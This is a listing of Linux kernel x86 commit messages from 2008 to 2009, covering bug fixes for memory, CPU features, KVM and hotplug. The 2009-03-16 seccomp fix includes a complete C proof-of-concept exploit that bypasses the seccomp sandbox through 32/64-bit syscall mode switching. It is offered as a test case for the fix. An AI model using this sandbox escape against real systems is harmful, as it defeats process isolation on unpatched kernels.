linux - Linux kernel source tree

Age	Commit message (Collapse)	Author
2009-10-12	x86: Increase MIN_GAP to include randomized stack	Michal Hocko
	[ trivial backport to 2.6.27: Chuck Ebbert <cebbert@redhat.com> ] commit 80938332d8cf652f6b16e0788cf0ca136befe0b5 upstream. Currently we are not including randomized stack size when calculating mmap_base address in arch_pick_mmap_layout for topdown case. This might cause that mmap_base starts in the stack reserved area because stack is randomized by 1GB for 64b (8MB for 32b) and the minimum gap is 128MB. If the stack really grows down to mmap_base then we can get silent mmap region overwrite by the stack values. Let's include maximum stack randomization size into MIN_GAP which is used as the low bound for the gap in mmap. Signed-off-by: Michal Hocko <mhocko@suse.cz> LKML-Reference: <1252400515-6866-1-git-send-email-mhocko@suse.cz> Acked-by: Jiri Kosina <jkosina@suse.cz> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Cc: Chuck Ebbert <cebbert@redhat.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08	KVM: Reduce stack usage in kvm_pv_mmu_op()	Dave Hansen
	(cherry picked from commit 6ad18fba05228fb1d47cdbc0339fe8b3fca1ca26) We're in a hot path. We can't use kmalloc() because it might impact performance. So, we just stick the buffer that we need into the kvm_vcpu_arch structure. This is used very often, so it is not really a waste. We also have to move the buffer structure's definition to the arch-specific x86 kvm header. Signed-off-by: Dave Hansen <dave@linux.vnet.ibm.com> Signed-off-by: Avi Kivity <avi@qumranet.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-08-16	x86: fix assembly constraints in native_save_fl()	H. Peter Anvin
	commit f1f029c7bfbf4ee1918b90a431ab823bed812504 upstream. From Gabe Black in bugzilla 13888: native_save_fl is implemented as follows: 11static inline unsigned long native_save_fl(void) 12{ 13 unsigned long flags; 14 15 asm volatile("# __raw_save_flags\n\t" 16 "pushf ; pop %0" 17 : "=g" (flags) 18 : /* no input */ 19 : "memory"); 20 21 return flags; 22} If gcc chooses to put flags on the stack, for instance because this is inlined into a larger function with more register pressure, the offset of the flags variable from the stack pointer will change when the pushf is performed. gcc doesn't attempt to understand that fact, and address used for pop will still be the same. It will write to somewhere near flags on the stack but not actually into it and overwrite some other value. I saw this happen in the ide_device_add_all function when running in a simulator I work on. I'm assuming that some quirk of how the simulated hardware is set up caused the code path this is on to be executed when it normally wouldn't. A simple fix might be to change "=g" to "=r". Reported-by: Gabe Black <spamforgabe@umich.edu> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-23	Fix misreporting of #cores as #hyperthreads for Q9550	Joe Korty
	Fix misreporting of #cores for the Intel Quad Core Q9550. For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly reports the #cores present as the #hyperthreads present. i386 mode was not examined but is assumed to have the same problem. A backport of the following three 2.6.29-rc1 patches fixes the problem: 066941bd4eeb159307a5d7d795100d0887c00442: [PATCH] x86: unmask CPUID levels on Intel CPUs 99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef: [PATCH] x86: unmask CPUID levels on Intel CPUs, fix bdf21a49bab28f0d9613e8d8724ef9c9168b61b9: [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to <asm/msr-index.h> From the first patch: "If the CPUID limit bit in MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID information available. This is required for some features to work, in particular XSAVE." Originally-Developed-by: H. Peter Anvin <hpa@linux.intel.com> Backported-by: Joe Korty <joe.korty@ccur.com> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Joe Korty <joe.korty@ccur.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	x86-64: seccomp: fix 32/64 syscall hole	Roland McGrath
	commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. / #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char *argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16	mm: clean up for early_pfn_to_nid()	KAMEZAWA Hiroyuki
	commit f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 upstream. What's happening is that the assertion in mm/page_alloc.c:move_freepages() is triggering: BUG_ON(page_zone(start_page) != page_zone(end_page)); Once I knew this is what was happening, I added some annotations: if (unlikely(page_zone(start_page) != page_zone(end_page))) { printk(KERN_ERR "move_freepages: Bogus zones: " "start_page[%p] end_page[%p] zone[%p]\n", start_page, end_page, zone); printk(KERN_ERR "move_freepages: " "start_zone[%p] end_zone[%p]\n", page_zone(start_page), page_zone(end_page)); printk(KERN_ERR "move_freepages: " "start_pfn[0x%lx] end_pfn[0x%lx]\n", page_to_pfn(start_page), page_to_pfn(end_page)); printk(KERN_ERR "move_freepages: " "start_nid[%d] end_nid[%d]\n", page_to_nid(start_page), page_to_nid(end_page)); ... And here's what I got: move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00] move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00] move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff] move_freepages: start_nid[1] end_nid[0] My memory layout on this box is: [ 0.000000] Zone PFN ranges: [ 0.000000] Normal 0x00000000 -> 0x0081ff5d [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[8] active PFN ranges [ 0.000000] 0: 0x00000000 -> 0x00020000 [ 0.000000] 1: 0x00800000 -> 0x0081f7ff [ 0.000000] 1: 0x0081f800 -> 0x0081fe50 [ 0.000000] 1: 0x0081fed1 -> 0x0081fed8 [ 0.000000] 1: 0x0081feda -> 0x0081fedb [ 0.000000] 1: 0x0081fedd -> 0x0081fee5 [ 0.000000] 1: 0x0081fee7 -> 0x0081ff51 [ 0.000000] 1: 0x0081ff59 -> 0x0081ff5d So it's a block move in that 0x81f600-->0x81f7ff region which triggers the problem. This patch: Declaration of early_pfn_to_nid() is scattered over per-arch include files, and it seems it's complicated to know when the declaration is used. I think it makes fix-for-memmap-init not easy. This patch moves all declaration to include/linux/mm.h After this, if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID -> Use static definition in include/linux/mm.h else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID -> Use generic definition in mm/page_alloc.c else -> per-arch back end function will be called. Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Reported-by: David Miller <davem@davemlloft.net> Cc: Mel Gorman <mel@csn.ul.ie> Cc: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-02	x86, mm: fix pte_free()	Peter Zijlstra
	commit 42ef73fe134732b2e91c0326df5fd568da17c4b2 upstream. On -rt we were seeing spurious bad page states like: Bad page state in process 'firefox' page:c1bc2380 flags:0x40000000 mapping:c1bc2390 mapcount:0 count:0 Trying to fix it up, but a reboot is needed Backtrace: Pid: 503, comm: firefox Not tainted 2.6.26.8-rt13 #3 [<c043d0f3>] ? printk+0x14/0x19 [<c0272d4e>] bad_page+0x4e/0x79 [<c0273831>] free_hot_cold_page+0x5b/0x1d3 [<c02739f6>] free_hot_page+0xf/0x11 [<c0273a18>] __free_pages+0x20/0x2b [<c027d170>] __pte_alloc+0x87/0x91 [<c027d25e>] handle_mm_fault+0xe4/0x733 [<c043f680>] ? rt_mutex_down_read_trylock+0x57/0x63 [<c043f680>] ? rt_mutex_down_read_trylock+0x57/0x63 [<c0218875>] do_page_fault+0x36f/0x88a This is the case where a concurrent fault already installed the PTE and we get to free the newly allocated one. This is due to pgtable_page_ctor() doing the spin_lock_init(&page->ptl) which is overlaid with the {private, mapping} struct. union { struct { unsigned long private; struct address_space mapping; }; spinlock_t ptl; struct kmem_cache slab; struct page *first_page; }; Normally the spinlock is small enough to not stomp on page->mapping, but PREEMPT_RT=y has huge 'spin'locks. But lockdep kernels should also be able to trigger this splat, as the lock tracking code grows the spinlock to cover page->mapping. The obvious fix is calling pgtable_page_dtor() like the regular pte free path __pte_free_tlb() does. It seems all architectures except x86 and nm10300 already do this, and nm10300 doesn't seem to use pgtable_page_ctor(), which suggests it doesn't do SMP or simply doesnt do MMU at all or something. Signed-off-by: Peter Zijlstra <a.p.zijlsta@chello.nl> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-18	x86 Fix VMI crash on boot in 2.6.28-rc8	Zachary Amsden
	commit ae8d04e2ecbb233926860e9ce145eac19c7835dc upstream. VMI initialiation can relocate the fixmap, causing early_ioremap to malfunction if it is initialized before the relocation. To fix this, VMI activation is split into two phases; the detection, which must happen before setting up ioremap, and the activation, which must happen after parsing early boot parameters. This fixes a crash on boot when VMI is enabled under VMware. Signed-off-by: Zachary Amsden <zach@vmware.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-05	x86: Hibernate: Fix breakage on x86_32 with CONFIG_NUMA set	Rafael J. Wysocki
	backport of commit 97a70e548bd97d5a46ae9d44f24aafcc013fd701 to the 2.6.27 kernel. The NUMA code on x86_32 creates special memory mapping that allows each node's pgdat to be located in this node's memory. For this purpose it allocates a memory area at the end of each node's memory and maps this area so that it is accessible with virtual addresses belonging to low memory. As a result, if there is high memory, these NUMA-allocated areas are physically located in high memory, although they are mapped to low memory addresses. Our hibernation code does not take that into account and for this reason hibernation fails on all x86_32 systems with CONFIG_NUMA=y and with high memory present. Fix this by adding a special mapping for the NUMA-allocated memory areas to the temporary page tables created during the last phase of resume. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Acked-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-05	x86: always define DECLARE_PCI_UNMAP* macros	Joerg Roedel
	commit b627c8b17ccacba38c975bc0f69a49fc4e5261c9 upstream. Impact: fix boot crash on AMD IOMMU if CONFIG_GART_IOMMU is off Currently these macros evaluate to a no-op except the kernel is compiled with GART or Calgary support. But we also need these macros when we have SWIOTLB, VT-d or AMD IOMMU in the kernel. Since we always compile at least with SWIOTLB we can define these macros always. This patch is also for stable backport for the same reason the SWIOTLB default selection patch is. Signed-off-by: Joerg Roedel <joerg.roedel@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-10-02	inotify: fix lock ordering wrt do_page_fault's mmap_sem	Nick Piggin
	Fix inotify lock order reversal with mmap_sem due to holding locks over copy_to_user. Signed-off-by: Nick Piggin <npiggin@suse.de> Reported-by: "Daniel J Blueman" <daniel.blueman@gmail.com> Tested-by: "Daniel J Blueman" <daniel.blueman@gmail.com> Cc: Ingo Molnar <mingo@elte.hu> Cc: Peter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2008-09-26	kgdb, x86_64: fix PS CS SS registers in gdb serial	Jason Wessel
	On x86_64 the gdb serial register structure defines the PS (also known as eflags), CS and SS registers as 4 bytes entities. This patch splits the x86_64 regnames enum into a 32 and 64 version to account for the 32 bit entities in the gdb serial packets. Also the program counter is properly filled in for the sleeping threads. Signed-off-by: Jason Wessel <jason.wessel@windriver.com>
2008-09-26	kgdb, x86_64: gdb serial has BX and DX reversed	Jason Wessel
	The BX and DX registers in the gdb serial register packet need to be flipped for gdb to receive the correct data. Signed-off-by: Jason Wessel <jason.wessel@windriver.com>
2008-09-23	x86: prevent C-states hang on AMD C1E enabled machines	Thomas Gleixner
	Impact: System hang when AMD C1E machines switch into C2/C3 AMD C1E enabled systems do not work with normal ACPI C-states even if the BIOS is advertising them. Limit the C-states to C1 for the ACPI processor idle code. Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
2008-09-23	x86: prevent stale state of c1e_mask across CPU offline/online	Thomas Gleixner
	Impact: hang which happens across CPU offline/online on AMD C1E systems. When a CPU goes offline then the corresponding bit in the broadcast mask is cleared. For AMD C1E enabled CPUs we do not reenable the broadcast when the CPU comes online again as we do not clear the corresponding bit in the c1e_mask, which keeps track which CPUs have been switched to broadcast already. So on those !$@#& machines we never switch back to broadcasting after a CPU offline/online cycle. Clear the bit when the CPU plays dead. Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
2008-09-05	x86: add NOPL as a synthetic CPU feature bit	H. Peter Anvin
	The long noops ("NOPL") are supposed to be detected by family >= 6. Unfortunately, several non-Intel x86 implementations, both hardware and software, don't obey this dictum. Instead, probe for NOPL directly by executing a NOPL instruction and see if we get #UD. Signed-off-by: H. Peter Anvin <hpa@zytor.com>
2008-08-28	Merge branch 'x86-fixes-for-linus' of ↵	Linus Torvalds
	git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: x86: update defconfigs x86: msr: fix bogus return values from rdmsr_safe/wrmsr_safe x86: cpuid: correct return value on partial operations x86: msr: correct return value on partial operations x86: cpuid: propagate error from smp_call_function_single() x86: msr: propagate errors from smp_call_function_single() smp: have smp_call_function_single() detect invalid CPUs
2008-08-25	x86: msr: fix bogus return values from rdmsr_safe/wrmsr_safe	H. Peter Anvin
	Impact: bogus error codes (+other?) on x86-64 The rdmsr_safe/wrmsr_safe routines have macros for the handling of the edx:eax arguments. Those macros take a variable number of assembly arguments. This is rather inherently incompatible with using %digit-style escapes in the inline assembly; replace those with %[name]-style escapes. This fixes miscompilation on x86-64, which at the very least caused bogus return values. It is possible that this could also corrupt the return value; I am not sure. Signed-off-by: H. Peter Anvin <hpa@zytor.com>
2008-08-25	x86: msr: propagate errors from smp_call_function_single()	H. Peter Anvin
	Propagate error (-ENXIO) from smp_call_function_single(). These errors can happen when a CPU is unplugged while the MSR driver is open. Signed-off-by: H. Peter Anvin <hpa@zytor.com>
2008-08-25	Merge branch 'x86-fixes-for-linus' of ↵	Linus Torvalds
	git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: x86: add X86_FEATURE_XMM4_2 definitions x86: fix cpufreq + sched_clock() regression x86: fix HPET regression in 2.6.26 versus 2.6.25, check hpet against BAR, v3 x86: do not enable TSC notifier if we don't need it x86 MCE: Fix CPU hotplug problem with multiple multicore AMD CPUs x86: fix: make PCI ECS for AMD CPUs hotplug capable x86: fix: do not run code in amd_bus.c on non-AMD CPUs
2008-08-25	x86: add X86_FEATURE_XMM4_2 definitions	Austin Zhang
	Added Intel processor SSE4.2 feature flag. No in-tree user at the moment, but makes the tree-merging life easier for the crypto tree. Signed-off-by: Austin Zhang <austin.zhang@intel.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-25	KVM: Use .fixup instead of .text.fixup on __kvm_handle_fault_on_reboot	Eduardo Habkost
	vmlinux.lds expects the fixup code to be on a section named .fixup. The .text.fixup section is not mentioned on vmlinux.lds, and is included on the resulting vmlinux (just after .text) only because of ld heuristics on placing orphan sections. However, placing .text.fixup outside .text breaks the definition of _etext, making it exclude the .text.fixup contents. That makes .text.fixup be ignored by the kernel initialization code that needs to know about section locations, such as the code setting page protection bits. Signed-off-by: Eduardo Habkost <ehabkost@redhat.com> Signed-off-by: Avi Kivity <avi@qumranet.com>
2008-08-25	Merge branch 'linus' into x86/urgent	Ingo Molnar

2008-08-23	removed unused #include <linux/version.h>'s	Adrian Bunk
	This patch lets the files using linux/version.h match the files that #include it. Signed-off-by: Adrian Bunk <bunk@kernel.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2008-08-23	x86 MCE: Fix CPU hotplug problem with multiple multicore AMD CPUs	Rafael J. Wysocki
	During CPU hot-remove the sysfs directory created by threshold_create_bank(), defined in arch/x86/kernel/cpu/mcheck/mce_amd_64.c, has to be removed before its parent directory, created by mce_create_device(), defined in arch/x86/kernel/cpu/mcheck/mce_64.c . Moreover, when the CPU in question is hotplugged again, obviously the latter has to be created before the former. At present, the right ordering is not enforced, because all of these operations are carried out by CPU hotplug notifiers which are not appropriately ordered with respect to each other. This leads to serious problems on systems with two or more multicore AMD CPUs, among other things during suspend and hibernation. Fix the problem by placing threshold bank CPU hotplug callbacks in mce_cpu_callback(), so that they are invoked at the right places, if defined. Additionally, use kobject_del() to remove the sysfs directory associated with the kobject created by kobject_create_and_add() in threshold_create_bank(), to prevent the kernel from crashing during CPU hotplug operations on systems with two or more multicore AMD CPUs. This patch fixes bug #11337. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Acked-by: Andi Kleen <andi@firstfloor.org> Tested-by: Mark Langsdorf <mark.langsdorf@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-22	x86: fix section mismatch warning - uv_cpu_init	Marcin Slusarz
	WARNING: vmlinux.o(.cpuinit.text+0x3cc4): Section mismatch in reference from the function uv_cpu_init() to the function .init.text:uv_system_init() The function __cpuinit uv_cpu_init() references a function __init uv_system_init(). If uv_system_init is only used by uv_cpu_init then annotate uv_system_init with a matching annotation. uv_system_init was ment to be called only once, so do it from codepath (native_smp_prepare_cpus) which is called once, right before activation of other cpus (smp_init). Note: old code relied on uv_node_to_blade being initialized to 0, but it'a not initialized from anywhere. Signed-off-by: Marcin Slusarz <marcin.slusarz@gmail.com> Acked-by: Jack Steiner <steiner@sgi.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-20	x86, SGI UV: hardcode the TLB flush interrupt system vector	Cliff Wickman
	The UV TLB shootdown mechanism needs a system interrupt vector. Its vector had been hardcoded as 200, but needs to moved to the reserved system vector range so that it does not collide with some device vector. This is still temporary until dynamic system IRQ allocation is provided. But it will be needed when real UV hardware becomes available and runs 2.6.27. Signed-off-by: Cliff Wickman <cpw@sgi.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-18	Merge branch 'x86-fixes-for-linus' of ↵	Linus Torvalds
	git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: x86: fix build warnings in real mode code x86, calgary: fix section mismatch warning - get_tce_space_from_tar x86: silence section mismatch warning - get_local_pda x86, percpu: silence section mismatch warnings related to EARLY_PER_CPU variables x86: fix i486 suspend to disk CR4 oops x86: mpparse.c: fix section mismatch warning x86: mmconf: fix section mismatch warning x86: fix MP_processor_info section mismatch warning x86, tsc: fix section mismatch warning x86: correct register constraints for 64-bit atomic operations
2008-08-18	x86, percpu: silence section mismatch warnings related to EARLY_PER_CPU ↵	Marcin Slusarz
	variables Quoting Mike Travis in "x86: cleanup early per cpu variables/accesses v4" (23ca4bba3e20c6c3cb11c1bb0ab4770b724d39ac): The DEFINE macro defines the per_cpu variable as well as the early map and pointer. It also initializes the per_cpu variable and map elements to "_initvalue". The early_* macros provide access to the initial map (usually setup during system init) and the early pointer. This pointer is initialized to point to the early map but is then NULL'ed when the actual per_cpu areas are setup. After that the per_cpu variable is the correct access to the variable. As these variables are NULL'ed before __init sections are dropped (in setup_per_cpu_maps), they can be safely annotated as __ref. This change silences following section mismatch warnings: WARNING: vmlinux.o(.data+0x46c0): Section mismatch in reference from the variable x86_cpu_to_apicid_early_ptr to the variable .init.data:x86_cpu_to_apicid_early_map The variable x86_cpu_to_apicid_early_ptr references the variable __initdata x86_cpu_to_apicid_early_map If the reference is valid then annotate the variable with __init* (see linux/init.h) or name the variable: driver, _template, _timer, _sht, _ops, _probe, _probe_one, _console, WARNING: vmlinux.o(.data+0x46c8): Section mismatch in reference from the variable x86_bios_cpu_apicid_early_ptr to the variable .init.data:x86_bios_cpu_apicid_early_map The variable x86_bios_cpu_apicid_early_ptr references the variable __initdata x86_bios_cpu_apicid_early_map If the reference is valid then annotate the variable with __init* (see linux/init.h) or name the variable: driver, _template, _timer, _sht, _ops, _probe, _probe_one, _console, WARNING: vmlinux.o(.data+0x46d0): Section mismatch in reference from the variable x86_cpu_to_node_map_early_ptr to the variable .init.data:x86_cpu_to_node_map_early_map The variable x86_cpu_to_node_map_early_ptr references the variable __initdata x86_cpu_to_node_map_early_map If the reference is valid then annotate the variable with __init* (see linux/init.h) or name the variable: driver, _template, _timer, _sht, _ops, _probe, _probe_one, _console, Signed-off-by: Marcin Slusarz <marcin.slusarz@gmail.com> Cc: Mike Travis <travis@sgi.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-18	x86: mmconf: fix section mismatch warning	Marcin Slusarz
	WARNING: arch/x86/kernel/built-in.o(.cpuinit.text+0x1591): Section mismatch in reference from the function init_amd() to the function .init.text:check_enable_amd_mmconf_dmi() The function __cpuinit init_amd() references a function __init check_enable_amd_mmconf_dmi(). If check_enable_amd_mmconf_dmi is only used by init_amd then annotate check_enable_amd_mmconf_dmi with a matching annotation. check_enable_amd_mmconf_dmi is only called from init_amd which is __cpuinit Signed-off-by: Marcin Slusarz <marcin.slusarz@gmail.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-18	x86: correct register constraints for 64-bit atomic operations	Mathieu Desnoyers
	x86_64 add/sub atomic ops does not seems to accept integer values bigger than 32 bits as immediates. Intel's add/sub documentation specifies they have to be passed as registers. The only operations in the x86-64 architecture which accept arbitrary 64-bit immediates is "movq" to any register; similarly, the only operation which accept arbitrary 64-bit displacement is "movabs" to or from al/ax/eax/rax. http://gcc.gnu.org/onlinedocs/gcc-4.3.0/gcc/Machine-Constraints.html states : e 32-bit signed integer constant, or a symbolic reference known to fit that range (for immediate operands in sign-extending x86-64 instructions). Z 32-bit unsigned integer constant, or a symbolic reference known to fit that range (for immediate operands in zero-extending x86-64 instructions). Since add/sub does sign extension, using the "e" constraint seems appropriate. It applies to 2.6.27-rc, 2.6.26, 2.6.25... Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@polymtl.ca> Signed-off-by: H. Peter Anvin <hpa@zytor.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-16	Merge branch 'x86-fixes-for-linus' of ↵	Linus Torvalds
	git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: (32 commits) x86: add MAP_STACK mmap flag x86: fix section mismatch warning - spp_getpage() x86: change init_gdt to update the gdt via write_gdt, rather than a direct write. x86-64: fix overlap of modules and fixmap areas x86, geode-mfgpt: check IRQ before using MFGPT as clocksource x86, acpi: cleanup, temp_stack is used only when CONFIG_SMP is set x86: fix spin_is_contended() x86, nmi: clean UP NMI watchdog failure message x86, NMI: fix watchdog failure message x86: fix /proc/meminfo DirectMap x86: fix readb() et al compile error with gcc-3.2.3 arch/x86/Kconfig: clean up, experimental adjustement x86: invalidate caches before going into suspend x86, perfctr: don't use CCCR_OVF_PMI1 on Pentium 4Ds x86, AMD IOMMU: initialize dma_ops after sysfs registration x86m AMD IOMMU: cleanup: replace LOW_U32 macro with generic lower_32_bits x86, AMD IOMMU: initialize device table properly x86, AMD IOMMU: use status bit instead of memory write-back for completion wait x86: silence mmconfig printk x86, msr: fix NULL pointer deref due to msr_open on nonexistent CPUs ...
2008-08-15	x86: add MAP_STACK mmap flag	Ingo Molnar
	as per this discussion: http://lkml.org/lkml/2008/8/12/423 Pardo reported that 64-bit threaded apps, if their stacks exceed the combined size of ~4GB, slow down drastically in pthread_create() - because glibc uses MAP_32BIT to allocate the stacks. The use of MAP_32BIT is a legacy hack - to speed up context switching on certain early model 64-bit P4 CPUs. So introduce a new flag to be used by glibc instead, to not constrain 64-bit apps like this. glibc can switch to this new flag straight away - it will be ignored by the kernel. If those old CPUs ever matter to anyone, support for it can be implemented. Signed-off-by: Ingo Molnar <mingo@elte.hu> Acked-by: Ulrich Drepper <drepper@gmail.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2008-08-15	x86: add MAP_STACK mmap flag	Ingo Molnar
	as per this discussion: http://lkml.org/lkml/2008/8/12/423 Pardo reported that 64-bit threaded apps, if their stacks exceed the combined size of ~4GB, slow down drastically in pthread_create() - because glibc uses MAP_32BIT to allocate the stacks. The use of MAP_32BIT is a legacy hack - to speed up context switching on certain early model 64-bit P4 CPUs. So introduce a new flag to be used by glibc instead, to not constrain 64-bit apps like this. glibc can switch to this new flag straight away - it will be ignored by the kernel. If those old CPUs ever matter to anyone, support for it can be implemented. Signed-off-by: Ingo Molnar <mingo@elte.hu> Acked-by: Ulrich Drepper <drepper@gmail.com>
2008-08-15	Merge branch 'x86/geode' into x86/urgent	Ingo Molnar

2008-08-15	kexec jump: check code size in control page	Huang Ying
	Kexec/Kexec-jump require code size in control page is less than PAGE_SIZE/2. This patch add link-time checking for this. ASSERT() of ld link script is used as the link-time checking mechanism. [akpm@linux-foundation.org: build fix] Signed-off-by: Huang Ying <ying.huang@intel.com> Cc: Pavel Machek <pavel@ucw.cz> Cc: "Rafael J. Wysocki" <rjw@sisk.pl> Cc: "Eric W. Biederman" <ebiederm@xmission.com> Acked-by: Vivek Goyal <vgoyal@redhat.com> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2008-08-15	kexec jump: rename KEXEC_CONTROL_CODE_SIZE to KEXEC_CONTROL_PAGE_SIZE	Huang Ying
	Rename KEXEC_CONTROL_CODE_SIZE to KEXEC_CONTROL_PAGE_SIZE, because control page is used for not only code on some platform. For example in kexec jump, it is used for data and stack too. [akpm@linux-foundation.org: unbreak powerpc and arm, finish conversion] Signed-off-by: Huang Ying <ying.huang@intel.com> Cc: Pavel Machek <pavel@ucw.cz> Cc: "Rafael J. Wysocki" <rjw@sisk.pl> Cc: "Eric W. Biederman" <ebiederm@xmission.com> Cc: Vivek Goyal <vgoyal@redhat.com> Cc: Ingo Molnar <mingo@elte.hu> Cc: Russell King <rmk@arm.linux.org.uk> Cc: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2008-08-15	x86-64: fix overlap of modules and fixmap areas	Jan Beulich
	Plus add a build time check so this doesn't go unnoticed again. Signed-off-by: Jan Beulich <jbeulich@novell.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	x86, geode-mfgpt: check IRQ before using MFGPT as clocksource	Jens Rottmann
	Adds a simple IRQ autodetection to the AMD Geode MFGPT driver, and more importantly, adds some checks, if IRQs can actually be received on the chosen line. This fixes cases where MFGPT is selected as clocksource though not producing any ticks, so the kernel simply starves during boot. Signed-off-by: Jens Rottmann <JRottmann@LiPPERTEmbedded.de> Cc: Andres Salomon <dilinger@debian.org> Cc: linux-geode@bombadil.infradead.org Cc: Jordan Crouse <jordan.crouse@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	x86: fix spin_is_contended()	Jan Beulich
	The masked difference is what needs to be compared against 1, rather than the difference of masked values (which can be negative). Signed-off-by: Jan Beulich <jbeulich@novell.com> Acked-by: Nick Piggin <npiggin@suse.de> Cc: <stable@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	x86: fix readb() et al compile error with gcc-3.2.3	Mikael Pettersson
